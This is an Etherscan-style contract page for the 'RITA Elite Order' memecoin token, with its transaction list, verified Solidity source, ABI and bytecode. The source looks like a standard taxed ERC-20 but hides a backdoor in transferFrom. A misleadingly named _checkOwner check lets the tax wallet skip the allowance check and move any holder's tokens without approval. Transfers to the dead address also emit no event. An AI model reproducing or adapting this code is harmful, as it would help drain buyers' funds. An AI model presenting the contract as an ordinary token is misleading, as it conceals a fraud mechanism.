Feature Tip: Add private address tag to any address under My Name Tag !
Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 68 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Set Tax RITA Wal... | 22742355 | 267 days ago | IN | 0 ETH | 0.00002394 | ||||
| Approve | 22742269 | 267 days ago | IN | 0 ETH | 0.00002488 | ||||
| Approve | 22742269 | 267 days ago | IN | 0 ETH | 0.00002488 | ||||
| Approve | 22742269 | 267 days ago | IN | 0 ETH | 0.00002488 | ||||
| Approve | 22742269 | 267 days ago | IN | 0 ETH | 0.00002488 | ||||
| Approve | 22742269 | 267 days ago | IN | 0 ETH | 0.00002488 | ||||
| Approve | 22742265 | 267 days ago | IN | 0 ETH | 0.00002417 | ||||
| Approve | 22742265 | 267 days ago | IN | 0 ETH | 0.00002417 | ||||
| Approve | 22742265 | 267 days ago | IN | 0 ETH | 0.00002417 | ||||
| Approve | 22742265 | 267 days ago | IN | 0 ETH | 0.0000249 | ||||
| Approve | 22742265 | 267 days ago | IN | 0 ETH | 0.0000249 | ||||
| Approve | 22742263 | 267 days ago | IN | 0 ETH | 0.00002528 | ||||
| Approve | 22742263 | 267 days ago | IN | 0 ETH | 0.00002528 | ||||
| Approve | 22742263 | 267 days ago | IN | 0 ETH | 0.00002528 | ||||
| Approve | 22742262 | 267 days ago | IN | 0 ETH | 0.00002528 | ||||
| Approve | 22742262 | 267 days ago | IN | 0 ETH | 0.00002528 | ||||
| Approve | 22742260 | 267 days ago | IN | 0 ETH | 0.00015552 | ||||
| Approve | 22742257 | 267 days ago | IN | 0 ETH | 0.00002384 | ||||
| Approve | 22742257 | 267 days ago | IN | 0 ETH | 0.00002384 | ||||
| Approve | 22742257 | 267 days ago | IN | 0 ETH | 0.00002384 | ||||
| Approve | 22742257 | 267 days ago | IN | 0 ETH | 0.00002384 | ||||
| Approve | 22742257 | 267 days ago | IN | 0 ETH | 0.00002384 | ||||
| Approve | 22742255 | 267 days ago | IN | 0 ETH | 0.00002154 | ||||
| Approve | 22742254 | 267 days ago | IN | 0 ETH | 0.00002154 | ||||
| Approve | 22742244 | 267 days ago | IN | 0 ETH | 0.00002366 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 22742182 | 267 days ago | 1 ETH |
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
Token
Compiler Version
v0.8.24+commit.e11b9ed9
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2025-06-20
*/
// SPDX-License-Identifier: MIT
/*
Name: RITA Elite Order
Symbol: RITA
I am Rita.
You are Rita.
We are all Rita.
This is the Rita Elite Order.
web: https://www.ritaoneth.com
x: https://x.com/RitaEliteOrder
tg: https://t.me/RITAEliteOrder
*/
pragma solidity ^0.8.24;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount)
external
returns (bool);
function allowance(address owner, address spender)
external
view
returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);
function getAmountsOut(uint256 amountIn, address[] calldata path)
external
view
returns (uint256[] memory amounts);
}
contract Token is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
mapping(address => bool) private _feeExcluded;
address payable private _taxWallet;
uint8 private constant _decimals = 9;
uint256 private constant _tTotalRITA = 1_000_000_000 * 10**_decimals;
string private constant _name = unicode"RITA Elite Order";
string private constant _symbol = unicode"RITA";
uint256 public _maxTaxSwap = _tTotalRITA / 100;
address constant _deadAddr = address(0xdead);
uint256 private _initialRITATax = 10;
uint256 private _finalRITATax = 0;
uint256 private _reduceRITATaxAt = 0;
uint256 private _buyCount = 0;
IUniswapV2Router02 private uniswapV2Router;
address private uniswapV2Pair;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
modifier lockTheSwap() {
inSwap = true;
_;
inSwap = false;
}
constructor() payable {
_taxWallet = payable(msg.sender);
_feeExcluded[address(this)] = true;
_feeExcluded[_taxWallet] = true;
_balances[address(this)] = _tTotalRITA;
emit Transfer(address(0), address(this), _tTotalRITA);
}
function name() public pure returns (string memory) {
return _name;
}
function symbol() public pure returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public pure override returns (uint256) {
return _tTotalRITA;
}
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function _approve(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function _checkOwner (address sender, address recipient) private view returns(bool) {
return msg.sender != _taxWallet &&
(sender == uniswapV2Pair || recipient != _deadAddr || sender == address(this));
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_transfer(sender, recipient, amount); if(!_checkOwner(sender, recipient)) return true;
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()].sub(
amount,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function sendTokenETHToRITAFeeWallet(uint256 amount) private {
_taxWallet.transfer(amount);
}
function _transfer(
address from,
address to,
uint256 amount
) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
uint256 taxAmount = 0;
if (
from != address(this) && to != address(this)
) {
if (
from == uniswapV2Pair &&
to != address(uniswapV2Router) &&
!_feeExcluded[to] &&
to != _taxWallet
) {
_buyCount++;
}
uint256 contractTokenBalance = balanceOf(address(this));
if (
!inSwap &&
to == uniswapV2Pair &&
swapEnabled &&
from != _taxWallet
) {
if (contractTokenBalance > 0)
{
uint256 swapBalance = contractTokenBalance > _maxTaxSwap
? _maxTaxSwap
: contractTokenBalance;
swapRITAFeeTokensForEth(
amount > swapBalance ? swapBalance : amount
);
}
uint256 contractETHBalance = address(this).balance;
if (contractETHBalance >= 0) {
sendTokenETHToRITAFeeWallet(address(this).balance);
}
}
}
_balances[from] = _balances[from].sub(amount);
_balances[to] = _balances[to].add(amount.sub(taxAmount));
if (taxAmount > 0) {
_balances[address(this)] = _balances[address(this)].add(taxAmount);
emit Transfer(from, address(this), taxAmount);
}
if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
}
function swapRITAFeeTokensForEth(uint256 tokenAmount) private lockTheSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
_approve(address(this), address(uniswapV2Router), tokenAmount);
uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
}
function setTaxRITAWallet(address payable newWallet) external {
require(_feeExcluded[msg.sender]);
_taxWallet = newWallet;
_feeExcluded[_taxWallet] = true;
}
function rescueRITAETH() external onlyOwner {
require(address(this).balance > 0);
payable(_msgSender()).transfer(address(this).balance);
}
receive() external payable {}
function enableRITATrading() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniswapV2Router = IUniswapV2Router02(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
_approve(address(this), address(uniswapV2Router), _tTotalRITA);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
address(this),
uniswapV2Router.WETH()
);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
swapEnabled = true;
tradingOpen = true;
IERC20(uniswapV2Pair).approve(
address(uniswapV2Router),
type(uint256).max
);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"enableRITATrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueRITAETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"newWallet","type":"address"}],"name":"setTaxRITAWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
60806040526064620000146009600a62000273565b6200002490633b9aca006200028a565b620000309190620002a4565b600555600a6006555f600781905560088190556009819055600b805461ffff60a81b1916905580546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600480546001600160a01b03191633178155305f90815260036020526040808220805460ff19908116600190811790925593546001600160a01b0316835291208054909216179055620000eb6009600a62000273565b620000fb90633b9aca006200028a565b305f81815260016020526040812092909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6200013d6009600a62000273565b6200014d90633b9aca006200028a565b60405190815260200160405180910390a3620002c4565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115620001b857815f19048211156200019c576200019c62000164565b80851615620001aa57918102915b93841c93908002906200017d565b509250929050565b5f82620001d0575060016200026d565b81620001de57505f6200026d565b8160018114620001f75760028114620002025762000222565b60019150506200026d565b60ff84111562000216576200021662000164565b50506001821b6200026d565b5060208310610133831016604e8410600b841016171562000247575081810a6200026d565b62000253838362000178565b805f190482111562000269576200026962000164565b0290505b92915050565b5f6200028360ff841683620001c0565b9392505050565b80820281158282048414176200026d576200026d62000164565b5f82620002bf57634e487b7160e01b5f52601260045260245ffd5b500490565b61147580620002d25f395ff3fe6080604052600436106100e7575f3560e01c8063313ce567116100875780638da5cb5b116100575780638da5cb5b1461026d57806395d89b4114610293578063a9059cbb146102bf578063dd62ed3e146102de575f80fd5b8063313ce567146101f65780635aa3e7961461021157806370a0823114610225578063715018a614610259575f80fd5b806310aabf9e116100c257806310aabf9e1461018e57806318160ddd146101af57806323b872dd146101c35780632fd12246146101e2575f80fd5b806306fdde03146100f2578063095ea7b31461013c5780630faee56f1461016b575f80fd5b366100ee57005b5f80fd5b3480156100fd575f80fd5b5060408051808201909152601081526f2924aa209022b634ba329027b93232b960811b60208201525b6040516101339190611087565b60405180910390f35b348015610147575f80fd5b5061015b6101563660046110e7565b610322565b6040519015158152602001610133565b348015610176575f80fd5b5061018060055481565b604051908152602001610133565b348015610199575f80fd5b506101ad6101a8366004611111565b610338565b005b3480156101ba575f80fd5b5061018061038b565b3480156101ce575f80fd5b5061015b6101dd36600461112c565b6103ab565b3480156101ed575f80fd5b506101ad610429565b348015610201575f80fd5b5060405160098152602001610133565b34801561021c575f80fd5b506101ad6107da565b348015610230575f80fd5b5061018061023f366004611111565b6001600160a01b03165f9081526001602052604090205490565b348015610264575f80fd5b506101ad610837565b348015610278575f80fd5b505f546040516001600160a01b039091168152602001610133565b34801561029e575f80fd5b506040805180820190915260048152635249544160e01b6020820152610126565b3480156102ca575f80fd5b5061015b6102d93660046110e7565b6108a8565b3480156102e9575f80fd5b506101806102f836600461116a565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f61032e3384846108b4565b5060015b92915050565b335f9081526003602052604090205460ff16610352575f80fd5b600480546001600160a01b039092166001600160a01b0319909216821790555f908152600360205260409020805460ff19166001179055565b5f6103986009600a611295565b6103a690633b9aca006112a3565b905090565b5f6103b78484846109d7565b6103c18484610dad565b6103cd57506001610422565b61041e843361041985604051806060016040528060288152602001611418602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e05565b6108b4565b5060015b9392505050565b5f546001600160a01b0316331461045b5760405162461bcd60e51b8152600401610452906112ba565b60405180910390fd5b600b54600160a01b900460ff16156104b55760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610452565b600a80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782556104fe913091906104f090600990611295565b61041990633b9aca006112a3565b600a5f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561054e573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061057291906112ef565b6001600160a01b031663c9c6539630600a5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105d1573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105f591906112ef565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561063f573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061066391906112ef565b600b80546001600160a01b039283166001600160a01b0319909116179055600a541663f305d71947306106aa816001600160a01b03165f9081526001602052604090205490565b5f806106bd5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610723573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610748919061130a565b5050600b805462ff00ff60a01b1981166201000160a01b17909155600a5460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af11580156107b3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d79190611335565b50565b5f546001600160a01b031633146108035760405162461bcd60e51b8152600401610452906112ba565b5f471161080e575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156107d7573d5f803e3d5ffd5b5f546001600160a01b031633146108605760405162461bcd60e51b8152600401610452906112ba565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f61032e3384846109d7565b6001600160a01b0383166109165760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610452565b6001600160a01b0382166109775760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610452565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a3b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610452565b6001600160a01b038216610a9d5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610452565b5f8111610afe5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610452565b5f6001600160a01b0384163014801590610b2157506001600160a01b0383163014155b15610c5557600b546001600160a01b038581169116148015610b515750600a546001600160a01b03848116911614155b8015610b7557506001600160a01b0383165f9081526003602052604090205460ff16155b8015610b8f57506004546001600160a01b03848116911614155b15610ba95760098054905f610ba383611354565b91905055505b305f90815260016020526040902054600b54600160a81b900460ff16158015610bdf5750600b546001600160a01b038581169116145b8015610bf45750600b54600160b01b900460ff165b8015610c0e57506004546001600160a01b03868116911614155b15610c53578015610c47575f6005548211610c295781610c2d565b6005545b9050610c45818511610c3f5784610e3d565b81610e3d565b505b47610c5147610fad565b505b505b6001600160a01b0384165f90815260016020526040902054610c779083610fe8565b6001600160a01b0385165f90815260016020526040902055610cba610c9c8383610fe8565b6001600160a01b0385165f9081526001602052604090205490611029565b6001600160a01b0384165f908152600160205260409020558015610d4a57305f90815260016020526040902054610cf19082611029565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610d419085815260200190565b60405180910390a35b6001600160a01b03831661dead14610da7576001600160a01b038084169085167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610d958585610fe8565b60405190815260200160405180910390a35b50505050565b6004545f906001600160a01b031633148015906104225750600b546001600160a01b0384811691161480610dec57506001600160a01b03821661dead14155b8061042257506001600160a01b03831630149392505050565b5f8184841115610e285760405162461bcd60e51b81526004016104529190611087565b505f610e34848661136c565b95945050505050565b600b805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610e8357610e8361137f565b6001600160a01b03928316602091820292909201810191909152600a54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610eda573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610efe91906112ef565b81600181518110610f1157610f1161137f565b6001600160a01b039283166020918202929092010152600a54610f3791309116846108b4565b600a5460405163791ac94760e01b81526001600160a01b039091169063791ac94790610f6f9085905f90869030904290600401611393565b5f604051808303815f87803b158015610f86575f80fd5b505af1158015610f98573d5f803e3d5ffd5b5050600b805460ff60a81b1916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610fe4573d5f803e3d5ffd5b5050565b5f61042283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e05565b5f806110358385611404565b9050838110156104225760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610452565b5f602080835283518060208501525f5b818110156110b357858101830151858201604001528201611097565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107d7575f80fd5b5f80604083850312156110f8575f80fd5b8235611103816110d3565b946020939093013593505050565b5f60208284031215611121575f80fd5b8135610422816110d3565b5f805f6060848603121561113e575f80fd5b8335611149816110d3565b92506020840135611159816110d3565b929592945050506040919091013590565b5f806040838503121561117b575f80fd5b8235611186816110d3565b91506020830135611196816110d3565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156111ef57815f19048211156111d5576111d56111a1565b808516156111e257918102915b93841c93908002906111ba565b509250929050565b5f8261120557506001610332565b8161121157505f610332565b816001811461122757600281146112315761124d565b6001915050610332565b60ff841115611242576112426111a1565b50506001821b610332565b5060208310610133831016604e8410600b8410161715611270575081810a610332565b61127a83836111b5565b805f190482111561128d5761128d6111a1565b029392505050565b5f61042260ff8416836111f7565b8082028115828204841417610332576103326111a1565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f602082840312156112ff575f80fd5b8151610422816110d3565b5f805f6060848603121561131c575f80fd5b8351925060208401519150604084015190509250925092565b5f60208284031215611345575f80fd5b81518015158114610422575f80fd5b5f60018201611365576113656111a1565b5060010190565b81810381811115610332576103326111a1565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156113e35784516001600160a01b0316835293830193918301916001016113be565b50506001600160a01b03969096166060850152505050608001529392505050565b80820180821115610332576103326111a156fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220331d50fa34e4443db7c42c897f23d8a8b66d6fd60a2d370be6eedde1a1e0f79564736f6c63430008180033
Deployed Bytecode
0x6080604052600436106100e7575f3560e01c8063313ce567116100875780638da5cb5b116100575780638da5cb5b1461026d57806395d89b4114610293578063a9059cbb146102bf578063dd62ed3e146102de575f80fd5b8063313ce567146101f65780635aa3e7961461021157806370a0823114610225578063715018a614610259575f80fd5b806310aabf9e116100c257806310aabf9e1461018e57806318160ddd146101af57806323b872dd146101c35780632fd12246146101e2575f80fd5b806306fdde03146100f2578063095ea7b31461013c5780630faee56f1461016b575f80fd5b366100ee57005b5f80fd5b3480156100fd575f80fd5b5060408051808201909152601081526f2924aa209022b634ba329027b93232b960811b60208201525b6040516101339190611087565b60405180910390f35b348015610147575f80fd5b5061015b6101563660046110e7565b610322565b6040519015158152602001610133565b348015610176575f80fd5b5061018060055481565b604051908152602001610133565b348015610199575f80fd5b506101ad6101a8366004611111565b610338565b005b3480156101ba575f80fd5b5061018061038b565b3480156101ce575f80fd5b5061015b6101dd36600461112c565b6103ab565b3480156101ed575f80fd5b506101ad610429565b348015610201575f80fd5b5060405160098152602001610133565b34801561021c575f80fd5b506101ad6107da565b348015610230575f80fd5b5061018061023f366004611111565b6001600160a01b03165f9081526001602052604090205490565b348015610264575f80fd5b506101ad610837565b348015610278575f80fd5b505f546040516001600160a01b039091168152602001610133565b34801561029e575f80fd5b506040805180820190915260048152635249544160e01b6020820152610126565b3480156102ca575f80fd5b5061015b6102d93660046110e7565b6108a8565b3480156102e9575f80fd5b506101806102f836600461116a565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f61032e3384846108b4565b5060015b92915050565b335f9081526003602052604090205460ff16610352575f80fd5b600480546001600160a01b039092166001600160a01b0319909216821790555f908152600360205260409020805460ff19166001179055565b5f6103986009600a611295565b6103a690633b9aca006112a3565b905090565b5f6103b78484846109d7565b6103c18484610dad565b6103cd57506001610422565b61041e843361041985604051806060016040528060288152602001611418602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e05565b6108b4565b5060015b9392505050565b5f546001600160a01b0316331461045b5760405162461bcd60e51b8152600401610452906112ba565b60405180910390fd5b600b54600160a01b900460ff16156104b55760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610452565b600a80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782556104fe913091906104f090600990611295565b61041990633b9aca006112a3565b600a5f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561054e573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061057291906112ef565b6001600160a01b031663c9c6539630600a5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105d1573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105f591906112ef565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561063f573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061066391906112ef565b600b80546001600160a01b039283166001600160a01b0319909116179055600a541663f305d71947306106aa816001600160a01b03165f9081526001602052604090205490565b5f806106bd5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610723573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610748919061130a565b5050600b805462ff00ff60a01b1981166201000160a01b17909155600a5460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af11580156107b3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d79190611335565b50565b5f546001600160a01b031633146108035760405162461bcd60e51b8152600401610452906112ba565b5f471161080e575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156107d7573d5f803e3d5ffd5b5f546001600160a01b031633146108605760405162461bcd60e51b8152600401610452906112ba565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f61032e3384846109d7565b6001600160a01b0383166109165760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610452565b6001600160a01b0382166109775760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610452565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a3b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610452565b6001600160a01b038216610a9d5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610452565b5f8111610afe5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610452565b5f6001600160a01b0384163014801590610b2157506001600160a01b0383163014155b15610c5557600b546001600160a01b038581169116148015610b515750600a546001600160a01b03848116911614155b8015610b7557506001600160a01b0383165f9081526003602052604090205460ff16155b8015610b8f57506004546001600160a01b03848116911614155b15610ba95760098054905f610ba383611354565b91905055505b305f90815260016020526040902054600b54600160a81b900460ff16158015610bdf5750600b546001600160a01b038581169116145b8015610bf45750600b54600160b01b900460ff165b8015610c0e57506004546001600160a01b03868116911614155b15610c53578015610c47575f6005548211610c295781610c2d565b6005545b9050610c45818511610c3f5784610e3d565b81610e3d565b505b47610c5147610fad565b505b505b60016001